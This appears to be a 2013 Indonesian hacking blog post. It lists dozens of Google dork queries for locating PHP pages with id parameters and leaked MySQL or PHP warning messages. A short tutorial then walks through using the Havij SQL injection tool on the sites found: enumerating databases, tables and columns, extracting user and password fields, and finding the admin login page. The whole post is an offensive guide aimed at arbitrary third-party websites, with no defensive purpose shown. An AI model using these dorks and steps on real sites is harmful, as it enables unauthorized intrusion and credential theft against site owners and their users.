inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

Kalo Udah ketemu... web Yang Vulnerable
Buka Havij Tools Nya

Download Nya : .::Cekidot
Tutor Nya..
./ Klik Table
./ Cari Dbs Nya , kalo udah Udah selesai.. Analyze nya dan berstatus IM IDLE
./ Cari Table
./ Cari Coloumn
./ Kalo ada Kata User/atau pengguna.. centang dan cari Coloum nya...
./Terus Get Password Nya..
./ Cari Halaman Admin Nya...
 

BL4ZTERZT404_ © 2013 BL4ZTERZT404 Blogs All Right Reserved
Thx To B374K and p4r4ghcyb3rn3t, Template Redesign by BL4ZTERZT404 - Blogs

Find Our Facebook!
Join Indonesia Blog Community!